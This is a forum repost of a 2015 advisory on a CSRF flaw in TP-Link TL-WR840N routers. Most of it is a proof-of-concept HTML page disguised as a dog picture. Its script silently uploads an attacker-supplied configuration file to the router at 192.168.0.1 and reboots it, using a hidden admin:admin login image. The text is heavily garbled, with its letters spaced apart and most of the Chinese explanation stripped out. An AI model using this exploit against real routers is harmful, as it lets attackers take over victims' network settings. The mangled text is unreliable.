搜索

[8590] 2015-01-15_TP-linkTL-WR840N系列路由器存在CSRF漏洞,可修改任意配置(含POC测试过程)

文档创建者:s7ckTeam
浏览次数:35
最后更新:2025-01-17
2015-01-15_TP-linkTL-WR840N系列路由器存在CSRF漏洞,可修改任意配置(含POC测试过程) T P - l i n k   T L - W R 8 4 0 N C S R F P O C F r e e B u f   2 0 1 5 - 0 1 - 1 5 ( ) ! T P - L i n k T P - L i n k   C S R F     D N S   T P - L i n k   T L - W R 8 4 0 N   C S R F 使 访 d o   a n y t h i n g   y o u   w a n t   ~ P O C   P O C     P O C  
P O C < h t m l > < h e a d > < t i t l e > C o o l   D o g   P i c < / t i t l e > < / h e a d > < b o d y >         < s c r i p t   t y p e = " t e x t / j a v a s c r i p t " >         e x p l o i t ( ) ;         f u n c t i o n   g e t C o n f i g u r e a t i o n F i l e ( f i l e ) {                 v a r   x m l h t t p   =   n e w   X M L H t t p R e q u e s t ( ) ;                 x m l h t t p . o p e n ( " G E T " , f i l e , f a l s e ) ;                 x m l h t t p . o v e r r i d e M i m e T y p e ( " t e x t / p l a i n ;   c h a r s e t = x - u s e r - d e f i n e d " ) ;                 x m l h t t p . s e n d ( n u l l ) ;                 r e t u r n   x m l h t t p . r e s p o n s e T e x t ;         }         f u n c t i o n   u p l o a d F i l e T o R o u t e r ( f i l e D a t a ,   f i l e n a m e ) {                 v a r   b o u n d a r y   =   " 3 6 7 8 1 5 2 7 8 4 8 4 0 7 9 5 6 3 3 2 2 6 5 6 0 7 0 " ;                 v a r   b o d y   =   ' ' ;                 b o d y   + =   ' - - - - - - - - - - - - - - - - - - - - - - - - '   +   b o u n d a r y   +   ' r n ' ;                 b o d y   + =   ' C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " f i l e n a m e " ;   f i l e n a m e = " c o n f i g . b i n " r n ' ;                 b o d y   + =   ' C o n t e n t - T y p e :   a p p l i c a t i o n / o c t e t - s t r e a m r n ' ;                 b o d y   + =   ' r n ' ;                 f o r   ( v a r   i   =   0 ; i < f i l e D a t a . l e n g t h ; i + + ) {                         b o d y   + =   S t r i n g . f r o m C h a r C o d e ( f i l e D a t a . c h a r C o d e A t ( i )   &   0 x f f ) ;                 }                 b o d y   + =   ' r n ' ;                 b o d y   + =   ' - - - - - - - - - - - - - - - - - - - - - - - - '   +   b o u n d a r y   +   ' r n ' ;                 b o d y   + =   ' C o n t e n t - D i s p o s i t i o n :   f o r m = d a t a ;   n a m e = " R e s t o r e " r n ' ;                 b o d y   + =   ' r n ' ;                 b o d y   + =   ' R e s t o r e r n ' ;                 b o d y   + =   ' - - - - - - - - - - - - - - - - - - - - - - - - '   +   b o u n d a r y   +   ' - - r n ' ;                 v a r   x m l h t t p   =   n e w   X M L H t t p R e q u e s t ( ) ;                 x m l h t t p . p o s t ( " P O S T " , " h t t p : / / 1 9 2 . 1 6 8 . 0 . 1 / i n c o m i n g / R o u t e r B a k C f g U p l o a d . c f g " , t r u e ) ;                 x m l h t t p . w i t h C r e d e n t i a l s   =   t r u e ;                 x m l h t t p . s e t R e q u e s t H e a d e r ( " C o n t e n t - T y p e " ,   ' m u l t i p a r t / f o r m - d a t a ; b o u n d a r y = - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - '   +   b o u n d a r y ) ;                 x m l h t t p . s e t R e q u e s t H e a d e r ( ' C o n t e n t - l e n g t h ' ,   b o d y . l e n g t h ) ;                 x m l h t t p . s e n d A s B i n a r y ( b o d y ) ;           }         f u n c t i o n   r e b o o t R o u t e r ( ) {                 v a r   x m l h t t p   =   n e w   X M L H t t p R e q u e s t ( ) ;                 x m l h t t p . o p e n ( " G E T " , " h t t p : / / 1 9 2 . 1 6 8 . 0 . 1 / u s e r R p m / C o n f U p d a t e T e m p . h t m " , t r u e ) ;                 x m l h t t p . w i t h C r e d e n t i a l s   =   t r u e ;                 x m l h t t p . s e n d ( n u l l ) ;         }         f u n c t i o n   s l e e p ( m i l l i s e c o n d s ) {                 v a r   s t a r t   =   n e w   D a t e ( ) . g e t T i m e ( ) ;                 f o r   ( v a r   i   =   0 ; i < 1 e 7 ; i + + ) {                         i f   ( ( n e w   D a t e ( ) . g e t T i m e ( )   -   s t a r t )   >   m i l l i s e c o n d s )   {                                 b r e a k ;                         }                 }         }         f u n c t i o n   e x p l o i t ( ) {                 s l e e p ( 3 0 0 0 ) ;                 v a r   c   =   g e t C o n f i g u r e a t i o n F i l e ( ' c o n f i g . b i n ' ) ;                 u p l o a d F i l e T o R o u t e r ( c , ' c o n f i g . b i n ' ) ;
                r e b o o t R o u t e r ( ) ;         }         < / s c r i p t >         < i m g   s r c = " h t t p : / / f c 0 5 . d e v i a n t a r t . n e t / f s 7 1 / f / 2 0 1 2 / 0 9 2 / a / e / a w w _ _ d e r p _ p u p p y _ b y _ c h r i s i i p o o - d 4 u u a h 3 . j p g " > < / i m g >         < i m g   w i d t h = ' 0 '   h e i g h t = ' 0 '   s r c = " h t t p : / / a d m i n : a d m i n @ 1 9 2 . 1 6 8 . 0 . 1 "   c l a s s = " h i d d e n " > < / i m g > < / b o d y > 3 . 1 3 . 2 7 ,   b u i l d 1 4 1 1 2 0   T L - W R 8 4 0 N   v 1   (   3 . 1 3 . 2 7 ,   b u i l d 1 4 0 7 1 4   ) [ s e c u r e w o r k s /   F r e e B u f F r e e B u f . C O M ]
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理